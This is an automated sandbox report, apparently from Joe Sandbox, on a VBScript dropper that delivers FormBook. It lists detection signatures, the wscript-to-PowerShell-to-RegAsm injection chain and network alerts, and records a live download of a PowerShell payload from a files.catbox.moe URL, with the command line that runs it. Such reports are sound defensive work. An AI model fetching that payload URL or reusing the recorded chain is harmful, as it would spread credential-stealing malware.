Windows Analysis Report
z68scancopy.vbs

Overview

General Information

Sample name: z68scancopy.vbs
Analysis ID: 1577448
MD5: f8d8d9515f5dea0a837e4ada0559cce9
SHA1: f6b49863b6aa0a17cb0da253d72b3126ca825ffc
SHA256: 6c342244e4efc5514dcbb7fce2bd00ad28531afe1f400257abd4acb8ecfac2d4
Tags: vbsuser-Porcupine

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected VBS Downloader Generic
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7424 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • x.exe (PID: 7844 cmdline: "C:\Users\user~1\AppData\Local\Temp\x.exe" MD5: 68FC317E2CC6A7B69F76B9D8DDEC0C79)
        • RegAsm.exe (PID: 7868 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
z68scancopy.vbs | JoeSecurity_VBS_Downloader_Generic | Yara detected VBS Downloader Generic | Joe Security |

Source | Rule | Description | Author | Strings
00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.1720694148.0000000000E50000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Process Memory Space: powershell.exe PID: 7660 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
        • 0x272d9f:$b1: ::WriteAllBytes(
        • 0x272dbb:$b2: ::FromBase64String(
        • 0x124925:$s1: -join
        • 0x1299d6:$s1: -join
        • 0x21790a:$s1: -join
        • 0x224b8b:$s1: -join
        • 0x22804d:$s1: -join
        • 0x2286e7:$s1: -join
        • 0x22a1e3:$s1: -join
        • 0x22c437:$s1: -join
        • 0x22cc5e:$s1: -join
        • 0x22d4b9:$s1: -join
        • 0x22dbf4:$s1: -join
        • 0x22dc26:$s1: -join
        • 0x22dc6e:$s1: -join
        • 0x22dc8d:$s1: -join
        • 0x22e4de:$s1: -join
        • 0x22e65a:$s1: -join
        • 0x22e6d2:$s1: -join
        • 0x22e765:$s1: -join
        • 0x22e9cb:$s1: -join

Source | Rule | Description | Author | Strings
7.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
7.2.RegAsm.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

            System Summary

            Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7424, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49701
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs", ProcessId: 7424, ProcessName: wscript.exe
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7424, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49701
            Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\x.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\x.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\x.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\x.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\x.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7660, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\x.exe" , ProcessId: 7844, ProcessName: x.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs", ProcessId: 7424, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\z68scancopy.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7424, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", ProcessId: 7660, ProcessName: powershell.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-12-18T13:37:43.056873+0100 | 2018856 | 1 | A Network Trojan was detected | 108.181.20.35 | 443 | 192.168.2.7 | 49701 | TCP
            2024-12-18T13:37:42.820303+0100 | 2827578 | 1 | A Network Trojan was detected | 192.168.2.7 | 49701 | 108.181.20.35 | 443 | TCP

            AV Detection

            Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Source: z68scancopy.vbsReversingLabs: Detection: 21%
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1720694148.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\Temp\x.exeJoe Sandbox ML: detected
            Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.7:49701 version: TLS 1.2
            Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp

            Spreading

            Source: Yara matchFile source: z68scancopy.vbs, type: SAMPLE

            Software Vulnerabilities

            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

            Networking

            Source: Network trafficSuricata IDS: 2827578 - Severity 1 - ETPRO MALWARE Likely Dropper Doc GET to .moe TLD : 192.168.2.7:49701 -> 108.181.20.35:443
            Source: Network trafficSuricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 108.181.20.35:443 -> 192.168.2.7:49701
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 108.181.20.35 443
            Source: Joe Sandbox ViewIP Address: 108.181.20.35 108.181.20.35
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /q8ynky.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: files.catbox.moe
            Source: powershell.exe, 00000004.00000002.1396144396.000001D881BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1423743791.000001D89007F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000004.00000002.1396144396.000001D881BA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000004.00000002.1396144396.000001D880001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000004.00000002.1396144396.000001D88183E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000004.00000002.1396144396.000001D881BA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000004.00000002.1396144396.000001D880001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000004.00000002.1423743791.000001D89007F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000004.00000002.1423743791.000001D89007F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000004.00000002.1423743791.000001D89007F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: wscript.exe, 00000000.00000003.1453026696.0000023359B15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe
            Source: wscript.exe, 00000000.00000003.1452350762.0000023357BD6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453923296.0000023357BD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452049395.0000023357BD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/
            Source: wscript.exe, 00000000.00000002.1454114233.00000233599A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453923296.0000023357BD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452049395.0000023357BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453704015.0000023357B17000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453767715.0000023357B28000.00000004.00000020.00020000.00000000.sdmp, z68scancopy.vbsString found in binary or memory: https://files.catbox.moe/q8ynky.ps1
            Source: wscript.exe, 00000000.00000003.1452187676.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453799990.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452534194.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1453187394.0000023357B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/q8ynky.ps13
            Source: wscript.exe, 00000000.00000003.1452187676.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453799990.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452534194.0000023357B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1453187394.0000023357B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/q8ynky.ps1=
            Source: wscript.exe, 00000000.00000003.1452801377.0000023357B27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453767715.0000023357B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/q8ynky.ps1k
            Source: wscript.exe, 00000000.00000003.1452350762.0000023357BD6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453923296.0000023357BD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452049395.0000023357BD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/~
            Source: wscript.exe, 00000000.00000003.1453026696.0000023359B15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe;
            Source: powershell.exe, 00000004.00000002.1396144396.000001D881BA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: wscript.exe, 00000000.00000003.1452350762.0000023357BD6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1453923296.0000023357BD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1452049395.0000023357BD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comZZZZ
            Source: powershell.exe, 00000004.00000002.1396144396.000001D881BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1423743791.000001D89007F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000004.00000002.1396144396.000001D88183E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000004.00000002.1396144396.000001D88183E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.7:49701 version: TLS 1.2

            E-Banking Fraud

            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1720694148.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            System Summary

            Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: x.exe.4.dr, Program.csLong String: Length: 382988
            Source: 4.2.powershell.exe.1d89066c238.0.raw.unpack, Program.csLong String: Length: 382988
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exe
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042C5E3 NtClose,7_2_0042C5E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E435C0 NtCreateMutant,LdrInitializeThunk,7_2_02E435C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02E42C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02E42DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E44340 NtSetContextThread,7_2_02E44340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E43090 NtSetValueKey,7_2_02E43090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E43010 NtOpenDirectoryObject,7_2_02E43010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E44650 NtSuspendThread,7_2_02E44650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42AF0 NtWriteFile,7_2_02E42AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42AD0 NtReadFile,7_2_02E42AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42AB0 NtWaitForSingleObject,7_2_02E42AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42BE0 NtQueryValueKey,7_2_02E42BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42BF0 NtAllocateVirtualMemory,7_2_02E42BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42BA0 NtEnumerateValueKey,7_2_02E42BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42B80 NtQueryInformationFile,7_2_02E42B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42B60 NtClose,7_2_02E42B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E439B0 NtGetContextThread,7_2_02E439B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42EE0 NtQueueApcThread,7_2_02E42EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42EA0 NtAdjustPrivilegesToken,7_2_02E42EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42E80 NtReadVirtualMemory,7_2_02E42E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42E30 NtWriteVirtualMemory,7_2_02E42E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42FE0 NtCreateFile,7_2_02E42FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42FA0 NtQuerySection,7_2_02E42FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42FB0 NtResumeThread,7_2_02E42FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42F90 NtProtectVirtualMemory,7_2_02E42F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42F60 NtCreateProcessEx,7_2_02E42F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42F30 NtCreateSection,7_2_02E42F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42CF0 NtOpenProcess,7_2_02E42CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42CC0 NtQueryVirtualMemory,7_2_02E42CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42CA0 NtQueryInformationToken,7_2_02E42CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42C60 NtCreateKey,7_2_02E42C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42C00 NtQueryInformationProcess,7_2_02E42C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42DD0 NtDelayExecution,7_2_02E42DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42DB0 NtEnumerateKey,7_2_02E42DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E43D70 NtOpenThread,7_2_02E43D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42D30 NtUnmapViewOfSection,7_2_02E42D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42D00 NtSetInformationFile,7_2_02E42D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42D10 NtMapViewOfSection,7_2_02E42D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E43D10 NtOpenProcessToken,7_2_02E43D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3E8F07_2_02E3E8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF68B87_2_02DF68B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E128407_2_02E12840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1A8407_2_02E1A840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E129A07_2_02E129A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EDA9A67_2_02EDA9A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E269627_2_02E26962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E199507_2_02E19950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2B9507_2_02E2B950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ECEEDB7_2_02ECEEDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E19EB07_2_02E19EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E22E907_2_02E22E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ECCE937_2_02ECCE93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E10E597_2_02E10E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ECEE267_2_02ECEE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1CFE07_2_02E1CFE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E02FC87_2_02E02FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ECFFB17_2_02ECFFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E11F927_2_02E11F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E84F407_2_02E84F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E52F287_2_02E52F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E30F307_2_02E30F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ECFF097_2_02ECFF09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E00CF27_2_02E00CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ECFCF27_2_02ECFCF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB0CB57_2_02EB0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E89C327_2_02E89C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E10C007_2_02E10C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0ADE07_2_02E0ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2FDC07_2_02E2FDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E28DBF7_2_02E28DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC7D737_2_02EC7D73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E13D407_2_02E13D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC1D5A7_2_02EC1D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1AD007_2_02E1AD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 02E7EA12 appears 84 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 02DFB970 appears 263 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 02E45130 appears 36 times
